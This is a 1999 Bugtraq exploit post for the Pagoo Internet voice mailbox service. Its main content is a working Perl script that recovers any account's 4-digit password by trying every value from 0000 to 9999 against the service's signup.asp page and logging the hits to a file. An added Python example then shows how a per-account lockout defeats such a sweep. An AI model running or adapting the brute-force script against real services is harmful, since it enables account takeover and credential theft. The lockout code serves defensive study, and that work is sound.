hhp: Pagoo VMB remote exploit.


Date: Tue, 22 Jun 1999 13:06:05 -0400
From: Elaich Of Hhp <hhp@NS.SUSPEND.NET>
To: BUGTRAQ@netspace.org
Subject: hhp: Pagoo VMB remote exploit.

#!/usr/bin/perl
#
#       (hhp) hhp-pagoo.pl (hhp)
#        by: elaich of the hhp.
#         http://hhp.hemp.net/
#                 '99'
#
# The (Pagoo Internet voice MailBox) exploit.
# Available at http://www.pagoo.com/
#
# This exploit will extract the password to
# the specified PagooID you specify.
#
# The vulnerability comes into play when you
# connect to your UpdateForm thru signup.asp
# which  requires  your  PagooID  and your 4
# digit password.
#
# Nothing will prevent you from reconnecting
# and trying  a  new  password from 0000  in
# increments  of  1 till we reach 9999 which
# is  the  highest  password  possible...  I
# could  call  this  a  brute, but it always
# 100%  of  the  time  will  get  the passwd
# unlike a brute.
#
# Logs passwds to file: pagooids

use IO::Socket;

die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
($box) = (@ARGV);

open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
autoflush OUT 1;

$host = "www.pagoo.com";
autoflush STDOUT 1;

sub parse
 {
  ($num) = @_;
  $url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";

  $socket = IO::Socket::INET->new(PeerAddr => $host,
                                  PeerPort => 80,
                                     Proto => "tcp") or die "Can't connect.\n";

  print $socket "GET $url\n";
  print "Trying password: $num of 9999.\n";
  while(<$socket>)
   {
        chomp;
        if(/Password invalid/)
         {
          # Perl's loop-exit keyword is "last"; "break" is not valid here.
          last;
         }
        if(/First Name/)
         {
          print "PagooID password extracted...\n";
          print "PagooID: $box / Password: $num\n";
          print OUT "PagooID: $box / Password: $num\n";
          exit 0;
         }

    }
 }
$num = '0000';
parse $num;

for($i = 0; $i <= 9999; $i++)
 {
  $num++;
  parse $num;
 }
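
The header comments above describe the missing control: nothing stops repeated guesses across the 10,000-value PIN space. The following is an added example of a per-account attempt limit, not part of the original post and not Pagoo's code. The class name, the policy values, the one-guess-per-second pacing and the sample account and PIN are assumptions constructed for illustration.

```python
import hmac

MAX_FAILURES = 5          # assumed policy: failed attempts allowed before a lock
LOCK_SECONDS = 15 * 60    # assumed policy: how long the account stays locked


class PinGate:
    """Per-account failure counter in front of a 4-digit PIN check."""

    def __init__(self, pins):
        self.pins = dict(pins)   # account id -> PIN (constructed sample data)
        self.failures = {}       # account id -> failed attempts since last lock
        self.locked_until = {}   # account id -> time at which the lock expires

    def check(self, account, pin, now):
        """Return 'ok', 'invalid' or 'locked' for one attempt at time `now`."""
        if now < self.locked_until.get(account, 0):
            return "locked"      # refuse without evaluating the PIN at all
        real = self.pins.get(account, "")
        if real and hmac.compare_digest(real, pin):
            self.failures.pop(account, None)
            return "ok"
        # Count by account, not by connection or source address: the script
        # above opens a fresh socket for every guess.
        count = self.failures.get(account, 0) + 1
        self.failures[account] = count
        if count >= MAX_FAILURES:
            self.locked_until[account] = now + LOCK_SECONDS
            self.failures[account] = 0
        return "invalid"


def sweep(gate, account):
    """Replay a 0000..9999 sweep, one guess per second (assumed pacing).

    Returns (number of PINs the server actually evaluated, whether one matched).
    """
    evaluated = 0
    for i in range(10000):
        result = gate.check(account, f"{i:04d}", now=i)
        if result == "ok":
            return evaluated + 1, True
        if result == "invalid":
            evaluated += 1
    return evaluated, False
```

With these values the full sweep gets only 60 of its 10,000 guesses evaluated, and the correct PIN is rejected as "locked" when it arrives inside a lock window, which is why the lock check has to come before the comparison.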
